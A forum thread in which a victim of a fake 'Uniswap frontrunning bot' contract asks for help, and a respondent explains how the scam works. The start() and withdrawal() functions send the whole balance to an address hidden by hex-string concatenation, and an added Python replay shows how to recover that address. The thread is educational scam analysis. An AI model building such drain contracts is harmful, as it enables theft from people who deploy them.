Uniswap frontrun smart contract scam?

Hello lads,

I have deployed a smart contract that I copy-pasted from a YouTube video that pretends to be a "Uniswap frontrunning bot". Yes, that was very noob of me, because I didn't know the risks at the beginning.
After that, as it was indicated, I had to fund the contract address.
I did research about this type of scam very late, because the YT video seemed very legit (content quality, comments etc...). After research I found out this is a scam, so I didn't use the start / withdraw functions on the contract.
Is there a way to edit the deployed contract functions in order to get funds back to my address? I have deployed it using Remix.
Contract code here: https://pastebin.com/PhQEkjir
Thanks in advance,

Unfortunately you can't.


Remix warns users too...


Thanks Freezy.
I guess I'd better keep the funds blocked in the smart contract then, so the scammer doesn't get them :rage:

Let's take this opportunity to try to learn how Solidity works:

In the contract you copied there are two functions that should interest you:

  • start()
  • withdrawal()

The code for these two functions is the following:

    function start() public payable { 
        emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
        payable(_callFrontRunActionMempool()).transfer(address(this).balance);
    }
 
    function withdrawal() public payable { 
        emit Log("Sending profits back to contract creator address...");
        payable(withdrawalProfits()).transfer(address(this).balance);
    }

You'll notice that both are very similar. In both cases they emit an event, which is supposed to say what is happening so that websites/indexers can react. In this case the content is just a bullshit string.

Then there is the actual code:

        payable(_callFrontRunActionMempool()).transfer(address(this).balance);

and

        payable(withdrawalProfits()).transfer(address(this).balance);

You can see that in both cases it's very similar. It takes some address and does a transfer to it, sending the entire balance of the contract. (transfer sends ETH, and address(this).balance is the amount of ETH currently held by the contract).

Neither of these functions has access protection. So anyone (you, me, the scammer) can call the function and drain the assets. The only thing he needs is the address of the contract. Note that if the scammer was smart, he would put an event in the constructor to help him detect instances deployed by victims, in case the victim stops halfway through the process like you did.

But then what is this address that the funds are sent to? In both cases it's the same:

    function _callFrontRunActionMempool() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }
    function withdrawalProfits() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }

parseMemoryPool is just a function that turns a hex string into an address. It's not very well written, but it works. If you go look at the callMempool() code, you'll see it's just trying to obfuscate the address of the attacker. Once you understand that the mempool() function is string concatenation and that checkLiquidity() is int to hex string (with left padding), you can reconstruct the address of the scammer.

Understanding how the scammer obfuscates his address in the code using bullshit variables like _memPoolSize is not that easy. But understanding what the start and withdrawal functions do is actually not that hard when you look into it.


Be careful of scammers, there are many, and they are very creative. One thing to keep in mind is: if it sounds too good to be true, then it probably is. If there was an easy and profitable way to frontrun Uniswap trades, that person would not tell you about it, and would exploit it themselves. Frontrunning is actually a thing, but it's very different from what that scammer claims. It's very hard to set up, and the few people that manage to profit from it will not tell their competition their secrets.
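As an added illustration of the explanation above (this is not code from the thread, the pastebin, or the scam contract), here is a small Python replay of the obfuscation pattern the post describes: integer constants formatted as fixed-width, left-padded hex strings (the role of checkLiquidity()), concatenated (mempool()), and finally parsed into a 20-byte address (parseMemoryPool()). The constants, function names and chunk width below are constructed for the example and are not the scam's real values; the point is that anyone holding the contract source can recompute the destination address offline and compare it with their own before ever calling start() or withdrawal().

```python
"""Replay of the hex-chunk address obfuscation described in the post.

Constructed example: the integer constants, the chunk width and the Python
function names are assumptions made for this illustration, not the values or
identifiers of the contract on pastebin.
"""

# Constructed stand-ins for the scam's "_memPoolSize"-style constants.
# These are NOT the pastebin contract's numbers; they are made up here.
CONSTRUCTED_CHUNKS = [0xDEADBEEF, 0x0000CAFE, 0x12345678, 0x9ABCDEF0, 0x0BADF00D]

# Assumed chunk width: five 8-digit chunks make the 40 hex digits of an address.
CHUNK_HEX_WIDTH = 8


def check_liquidity(value: int, width: int = CHUNK_HEX_WIDTH) -> str:
    """Int -> lowercase hex string, left-padded with zeros to `width` digits.

    This is the role the post assigns to checkLiquidity(). The padding is what
    makes the trick work: 0xCAFE must still occupy a full 8-digit slot, or the
    concatenated string would be too short to be an address.
    """
    if value < 0 or value >= 1 << (4 * width):
        raise ValueError(f"{value:#x} does not fit in {width} hex digits")
    return format(value, f"0{width}x")


def mempool(left: str, right: str) -> str:
    """Plain string concatenation, which is all the scam's mempool() does."""
    return left + right


def call_mempool(chunks=CONSTRUCTED_CHUNKS) -> str:
    """Build the 40-digit hex body the way callMempool() does: one padded
    chunk per constant, glued together in order."""
    body = ""
    for chunk in chunks:
        body = mempool(body, check_liquidity(chunk))
    return body


def parse_memory_pool(hex_body: str) -> str:
    """Turn a 40-hex-digit string into a 0x-prefixed address, rejecting junk.

    The contract's parseMemoryPool() does the same conversion on-chain; doing
    it here lets you see the recipient without sending a transaction.
    """
    body = hex_body[2:] if hex_body.lower().startswith("0x") else hex_body
    if len(body) != 40:
        raise ValueError(f"expected 40 hex digits, got {len(body)}")
    int(body, 16)  # raises ValueError if any character is not hex
    return "0x" + body.lower()


def recover_destination(chunks=CONSTRUCTED_CHUNKS) -> str:
    """The address start()/withdrawal() would transfer() the whole balance to."""
    return parse_memory_pool(call_mempool(chunks))


def is_own_address(destination: str, my_address: str) -> bool:
    """Case-insensitive comparison: the only check that matters before funding."""
    return destination.lower() == my_address.lower()


if __name__ == "__main__":
    dest = recover_destination()
    print("balance would be sent to:", dest)
    # Constructed deployer address for the demonstration.
    print("matches deployer?", is_own_address(dest, "0x0000000000000000000000000000000000000001"))
```

Run it against the real constants from a contract you are inspecting by replacing CONSTRUCTED_CHUNKS (and the width, if the contract pads differently); if recover_destination() is not your own address, the contract was never going to send you anything.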

Really, thanks for these explanations @Amxx, the way that this code works (despite its "simplicity") is quite fascinating.
To be honest I wasn't interested in Solidity development, and had no idea about how smart contracts work. But this scam allowed me to discover it. I guess I will start learning it and try launching my own smart contracts soon :slight_smile:

[quote="Amxx, post:4, topic:37075"]
Note that if the scammer was smart, he would put an event in the constructor to help him detect instances deploy by victims in case the victim stops halfway through the process like you did.
[/quote] => By the way, the scam is even worse than that: he shared a fake Remix link (a Remix fork, surely) that I have used... which probably allows him to track addresses. Since I didn't know about Remix at all... it's okay, we learn from errors like that.

By the way, if someone is curious, here is the scam video /!\ SCAM ALERT, DO NOT FOLLOW INSTRUCTIONS /!\
Scammers have become very creative, the content quality is really good.... please don't hesitate to report the channel.

Many thanks